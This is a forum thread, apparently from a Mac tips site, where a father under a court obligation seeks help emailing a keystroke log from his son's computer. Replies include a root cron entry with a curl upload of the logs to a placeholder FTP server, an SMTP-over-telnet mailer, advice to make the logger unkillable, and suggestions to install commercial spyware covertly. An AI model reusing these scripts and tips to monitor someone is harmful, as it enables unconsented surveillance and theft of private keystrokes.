Evil dad needs help spying on son
 

For reasons discussed in a macnn forum (http://forums.macnn.com/showthread.p...hreadid=189139), I'd like to set up a cron script that will periodically email me the keystroke log file from my son's computer. Before you jump on me with scathing criticisms, I respectfully ask that you read the discussion on the macnn forum listed above for a sense of what is going on. What I really need is help writing the cron script. My son will be aware that his computer has a keystroke logger installed and that it will periodically email me the log, so it doesn't need to be completely invisible, but I'd like it to be as unobtrusive as possible.
My son is at boarding school and has dial up internet access, so his computer will not always be on the net. I've fooled around a little with the terminal, but only when I have very specific instructions as to what I should do. I need someone to tell me exactly what needs to be done in the terminal to accomplish my goals. I would really appreciate any assisitance the forum can offer.
THank you in advance for your help.
rjc3

hopeless
 

Well I read through the forum discussion that you linked to and I do sympathize. But I think it is hopeless to install a keystroke logger and expect that your son will not be able to disable it if he wants to. Especially if you tell him that you are doing this - as you evidently have decided to (I agree - you certainly should tell him if you do this!).

Anyone with physical access to a computer can get full control over that computer. The knowledge needed to do this would be available to your son within 3 minutes of doing a google search.

The only hope of control or secure monitoring of his Internet activities would be via the network that he connects to - i.e. via machines that he does not have any control over.

i've got to agree with hayne, here. this approach will most certainly fail shortly. or worse, you'll get crafted, pedestrian reports that will give you a false sense of surety.

there are several commercial/shareware packages to accomplish this.

depending on your son's level of expertise, he could disable any of these, but unless he were pretty smart about how he went about this (ie, sometimes turned it off, sometimes turned it on) you would at least know he'd disabled it.

and of course, he could always use someone else's machine...

i'd say the best bet would be to install a commercial solution, and not inform him. properly designed, a system would be difficult to find unless the user's tech knowlege of the OS X system was pretty high.

thanks for the comments. I'm not worried about my son tampering with the terminal. He is aware spyware is being installed, and will be instructed that if the log stops reporting, or exhibits other suspicious behaviour, there will be hell to pay. I acknowledge the possibility that he will simply use a friend's computer to do the evil deed, and am not aware of any way to prevent this. However, I have assured the court that I will do everything in my power to make sure he doesn't do it again, and if he does it on a friend's computer, at least I can demonstrate to the court that I took every reasonable precaution.
And really, I am already committed to this idea and am simply looking for the cron command. Thank you.

You don't need a cron command or any knowledge of Terminal - you should just install one of the several keylogging applications that you will find on shareware sites and which I think were already pointed out to you in that MacNN forum.

rjc3,

Me too, I believe that what you want to do, will not work, despite your good intentions of protecting your son against himself.

IMHO, best monitoring is done by keeping your son near, sharing and doing things together, lots of love, patience and understanding, and not having him far away at a boarding school (especially when he is going through a rough time in his young life) as he might need to feel the confidence and support of the people who love him.

I wish the best of luck for your son and you...!

if you gave me that iBook, with the knowledge that spyware was present, i could find it and send fake logs. i don't know about level of your son's OS system literacy, but that's why you might want to consider not telling him about the spyware, if it's not too late.

of course, if your priority is trying to protect yourself in the court's eyes, this isn't an issue.

---

writing this yourself won't be trivial. i'd consider pre-packaged solutions.

Not disclosing the existence of spyware would be an intolerable breach of trust that would likely cause much more damage than anything his son might do. It would be intolerable if this was an employer-employee relationship but here this is father-son!

morality is obviously a hell of a lot more complex than tech, and given the background of the situation, the father here may have cause for that type of sneakiness. then again, he may not.

it's a grey and murky decision, and happily, the morality of the issue isn't my call.

i'm more interested in the practicalities of the tech solutions, and as far as that goes, almost any solution where the son is informed that spyware is present is incredibly vulnerable to undetectable failure if the son has good tech proficiency, or is sufficiently motivated to acquire good tech proficiency.

Indeed - and not to beat a dead horse, but I wasn't recommending anything on the basis of right or wrong - I was instead recommending on the basis of likeliness to succeed in the higher goal of helping his son. I.e. I feel that the father-son relationship is too valuable to risk for such monitoring.

rjc3 --

Sounds like you (and your son!) are in a tough situation. I share the others' reservations about the logger, but I also think I understand your reasoning.

To automate the cron job you might consider installing anacron, which you can install from fink.

The main page had a hint this week talking about anacron.

I'll also throw this one out for your consideration: have you thought about having the logs sent to you using a command script, and telling him to click on that script once a day to run it? I don't think that the logs you receive under that sort of arrangement would be any more vulnerable to alteration than ones sent by a cron job.

It would allow you to try to reestablish a degree of trustful communication with your son.

In any event, good luck to you both.

Breen

Went over to the other site and read through the thread. I'd have to agree with you, you do need to be able to monitor your son's online activity. Wish I knew of programs for the mac to do this but I don't.

Going a bit off the topic, there may be a good reason for sending the son off to boarding school - to get the son away from his young friends who are bad influence. And, the role of a parent at this stage is to be a parent, not be a best friend. If that means laying down the law so be it.

I had a lot of ideas about being a parent before I became one, but once I did become a parent my outlook was completely different. Beforehand I almost thought of a parent as a policeman or a judge and jury (although nice ones), but afterward I realized that their role is more like that of a guide. [I had excellent parents, so it is not their fault that my view of disciplining was warped.]

While monitoring without telling him might be efficient at policing, it does not show him that he can go to his parents (or people close to him) when he needs help and work with them to achieve a goal, and it does not help him learn how to avoid the problem himself longterm. If he ever discovered the surreptitious monitoring, it will teach him that he can't trust his parent (or they don't trust him) Ultimately this might drive him away from people who are close to him and teach him to be a loner or to try to deal with problems all by himself (not always easy or possible).

By working with him in this way, with his knowledge, the parent is working with him to provide a bit of a buffer against the temptation to repeat the offense. While he could still repeat the offense, it would not be as easy and this additional effort along with his conscience might very well prevent it. At any rate, it is a model for working with people close to you to overcome difficulties. It might not work, but then again it would not have worked anyway; ultimately the goal is not one of apprehension but one of teaching him to guide himself.

My parents were pretty strict with us until the 8th grade, at which time we were given all the latitude in the world to work with. It is difficult to learn responsibility if you are not extended enough freedom to practice responsibility. If we made mistakes, we were still at home and in an environment where we could easily get help managing ourselves. By the time we left home for college, we were all ready for the resulting independence.

Anyway, sorry for the long letter. It is not a claim that I know anything or everything, just a statement of the north star my parents taught me to use as a guide.

I started this letter and then started some laundry and came back and finished the letter. Moreover the letter took a long time to write and was started before lolajl had posted. I did not read lolajl's post until after I had finished the above letter. I want it to be clear that my comments about 'not being a policeman' were not inspired by lolajl's letter. There is truth in what he says about sometimes 'laying down the law'.

How does the keylogger save the files? Are there a bunch of files or just one? How large are the files? Does he use Panther?

Is emailing the files really the best way to do it? I mean, how large might these files get? It could easily overflow your email space if you only get about 15MB worth of mailbox space (very typical).

Is cron the best beast for the job? I mean, they tend to be extremely hit-or-miss, and you're hitting another barrier with the dialup internet access (not always on). Perhaps it would make more sense to wrap it in a daemon that would trigger every time he dials up. Of course, that's where my help would end, since I've never done anything like that.

I think some of what you're asking is certainly doable. I have no real knowledge of keystroke recorders (one was just announced, though I can't remember its name... see what I mean!), but I can point out a few UNIXy things.

First, you must take away administrator privelleges, and enter an administrator password yourself. Yeah, it will severely limit his ability to install some software, but oh well. He can also reset the root/admin password if he has access to the Panther install disks, and there is just plain no way around this fact.

Okay, your second trick is to set up the key generator to "respawn" whenever it is killed. Try, for example to kill cupsd. Yeah it dies, but a new one starts right back up!

These two tricks guarantee that your son will not be able to stop the key logging. Nor will he be able to delete the log files.

Unfortunately, I do not know how to designate a process to respawn whenever it's killed. But it may be that key loggers do this by default (I mean if it dies, what good is having it?). And I am sure that some more admin-experienced OS X users here can throw some instructions your way.

You definitely do not want to use cron for the logger. It needs to be started at boot, be running as root, and respawn whenever it dies.

That said, you probably *do* want to use cron to e-mail the logs. In this regard you would have two things going on: the key logger running at all times, an e-mailer started by cron every so often to e-mail the logs. (Again, I imagine some key loggers would be designed to do both of these.)

Sure, your son can keep the logs from being downloaded/e-mailed to you (but then he won't be on the Internet, so problem solved!). And sure, he can reformat the drive. And yeah, he can reset the password with the install CD. These issues are insurmountable... on any computer system!

Good luck.

Probably, but still this doesn't "smell" right to me. Something went wrong here from the very beginning...besides, do you know many thieves who got reformed because they went to jail?

Love is truly much more powerful than reason.

Do you know many thieves?

Okay, at this point maybe it would be a good idea to end the debating and answer the poor guy's question...

Roger that, he wanted help on keylogging and I think he's established enough justification for it. The risk of losing his son's trust is far outweighed by the risk of what would happen to his son's future were he to repeat his past errors. I lied plenty to my parents at that age...

You can disable the ability to boot from a CD with Open Firmware Password.

No, I don't. Sorry you couldn't understand what I really meant with that sentence.

No debating here, I feel great respect for the father and son problems, just wanted to help from another point of view, that's all.

And for answering his question, I think he already got several good suggestions on how to do it in the posts at MacNN and here on this thread, including quite a good suggestion by yourself.

Oh no I did understand. My point was that most people don't know any theives, or inmates for that matter, so it's not a very solid argument to say "do you know many thieves who got reformed because they went to jail." The answer is almost invariably "no" but *not* because jail didn't work, but because they just don't know any thieves!

Uh oh..... I just realized I'm arguing with the moderator! Forget everything I just said... and pleaaaaseeee don't ban me!! :)

Looks like I missed a good debate last night - maybe we should add a Family Counselling section. If the son comes here next month and asks for help removing spyware I wonder If there will be the same amount of discussion about wether that's a good idea or not.
<end of sarcasm>
Mr. Rjc came to us for help of a computational nature - he's already been through the moralizing and doesn't need his family's issues publically flogged again.

The last post by Mr. Rjc requested help with the cron command. You don't say how unix-fluent you are, so let's start with the basics.

Cron by itself will run a single command, or a script, at the specified time. You will have a problem with the internet connection here, unless you set cron to run frequently. (say, top of every hour). To move a file from a local machine to a known remote machine with ftp my personal favourite is curl.
So: create the cron entry to run a command every hour
-------------code----------------------
]$ su
]# crontab -e
i
0 /1 * * * /path/to/script
<esc>:wq
--------------/code---------------------

next, save this script somewhere in protected space, and make it executable with chmod +x filename)

-------------code----------------------
#!/bin/sh
curl -s -T /path/to/logs -u username -ppassword --url www.website.com/folder/file
--------------/code---------------------


Cron requires that you have an ftp server in a known location. Sign up for some free webhosting somewhere. If the computer is not connected when the script runs curl will fail silently until the next time.

Using sendmail will be a bit more complicated, as you will have to configure sendmail properly and activate it in the startup configuration. Write back if you prefer this route.


Since the issue of local monitoring seems to be well answered both here and elsewhere I will add one suggestion that seems to have been largely ignored. As it has been well-established that a non-secret logging system is easy to bypass, and your issue seems to be one of honesty-checking rather than true monitoring, perhaps you should ask the ISP in the school's area to send you copies of the connection logs. Since I presume you are paying this should not be a problem if you explain the reasons to the company's security manager. The ISP's logs can be compared to the machine's local records to see if everything is in order (or not). If they give you grief you could go back to the judge for an order. The ISP is also able to record every packet in and out to a connection, but they will probably need an official boot in to rear to do this.

If the school ever gets broadband access consider using OSXVnc, available from www.redstonesoftware.com/osxvnc
It's started from a ssh session and runs entirely in the background. Gives you a complete view of the desktop in real time. I use it to remote administer a friends' Mac in Canada from my home in Japan. But it's too bandwidth-intensive to use on a dial-up.

Of course point taken, I stand corrected, perhaps I should have expressed myself better, maybe by saying something like... "I believe that jail, most of the time, doesn't reform criminals".

EatingPie, for me, we are just having a conversation, no arguing here. Everybody is allowed to share their point of view in these forums as long as it is done in a respectful and civilized manner. :)

I like acme.mail.order's suggestion of Persuing the ISP for logs
 

RE: I like acme.mail.order's suggestion of Persuing the ISP for logs

There seems to be a certain elegance to it.
Now of course anything can be circumvented.... e.g. A different ISP, Internet Cafe, etc. However, this is no worse then reinstalling the OS cracking a Logger etc.
The only down side is that "rjc3/Evil Dad" might be uncomfortable Approaching the ISP.
---------------------------------------------------------

I have a silly ? Did the judge really intend for you to make this specefic HUGE effort, rather then just having HEART TO HEART conversations on a regular basis? You need not answer. Just think about what I and others wrote e.g., below.

It seems that those that are misguided can be guided, and those that are so troubled that they are self destructive will find a way to do so in spite of and or because of the measures we are discussing.

Finally, counceling is probably somthing worth considering perhaps for one or both parties.
There may also be suggested courses of Action by the court or professionals (in situations like these). I would not dismiss them.

Good Luck.

I think the ISP logs are a good way to go. But do you pay the ISP or is it your son's name on the account? In the first case the logs are yours. The latter case could be more difficult. However, if i understand correctly, should the court order you to do something it is also obligated to be sure the is some way for you to accomplish that order. The logs are arguably necessary. Ergo, a court order should be a foregone conclusion.

ISPs have to Comply with this stuff all the time for Police and court cases
 

ISPs have to Comply with this stuff all the time for Police and Court cases...

Not sure how it works proactively. Certainly a court order works 100%. Court could advice on methodology or form that had to be filled out.

I would approach the ISP first anyway. Probably easier to get on the Phone...

commercial apps for this
 

I have TypeRecorder on my computer (Jaguar) and the company sent notice that it is working on a version for Panther but also mentioned products (see below) that might do exactly what you want since they are designed for remote viewing of the type you require. I use TypeRecorder in case I ever trash a letter or an email and then realize the next day that I want to send a portion of it to someone else.

Spector 3.0 for OS X, and ViewRemote 2.16 for OS X.
Spector (see www.spectorsoft.com) record everything that happens on your computer---in addition to keystrokes it also records screenshots,
so you can watch your computer like a movie.
ViewRemote has all the features of TypeRecorder but allows you to view logs from ANYWHERE in the world---it records everything that happens on your
computer, like TypeRecorder, and securely sends it to a server. See www.viewremote.com.

Interesting and Spooky software IMHO
 

Spectre Requires: Approximately 80MB of disk space for a typical day of recording

I suppose there are options to turn off the screen shots to save space for Dial Up?

logging space and fraud security
 

a way to get it all done quite smooth is to have the cronjob running which additionally will compress (unix compress should be fine) the file and also run via the script a file encrypter. if you need more help on this let me know.

Hello,

Well here's how I would go about it. First get a keylogging software:

<http://www.macupdate.com/search.php?...x=0&button.y=0>

This one has the best reviews:

<http://www.macupdate.com/info.php/id/12000>

I'd configure that one to only take pictures of the screen if certain important keywords came up or the files could end up being too large.

Anyway, I'd first install anacron with fink, that way the cron would get run even if the computer is asleep at the time, then I'd write up a daily.local and put it in /etc.

The other thing I'm doing in the script is talking smtp manually, the reason for this is that to run the mail command I think you need to have sendmail or postfix running, which I think complicates things a bit. Anyway, the script uses telnet.

/etc/daily.local

And that should work well. Unfortunately when testing it doesn't work as advertised, yet I'm not sure why. If I telnet to port 25 or my mailserver and paste in the ${mail} file generated it works perfectly, but if I use:

telnet mail.example.com 25 < ${mail}

It doesn't work and my mailserver complains that: "did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA"

Can someone clear up why?


v

why telnet 25
 

if you are already yusing telnet why not do a rcp ? this way you can use the standard ports and no playing with a mail server ?!

Because then he needs to set up either a static IP, or get dyndns.org set up. Additionally he has to enable telnet on his box, which is (I think) a security risk as telnet transmits passwords in clear text. If we were to do that, then I guess we'd have to set it up with ssh and a key, use scp.

By emulating a mailserver I thought it'd be the easiest way. And again, the message generated actually works when copied and pasted, it doesn't work when using redirects. I think maybe redirects aren't doing what I think they should be doing.

Reading through the telnet manual I can't find anything that would work, thought of trying .telnetrc: "Lines that begin without white space are the start of a machine entry" but that didn't work.

Maybe it'd be better if instead of using telnet I use netcat.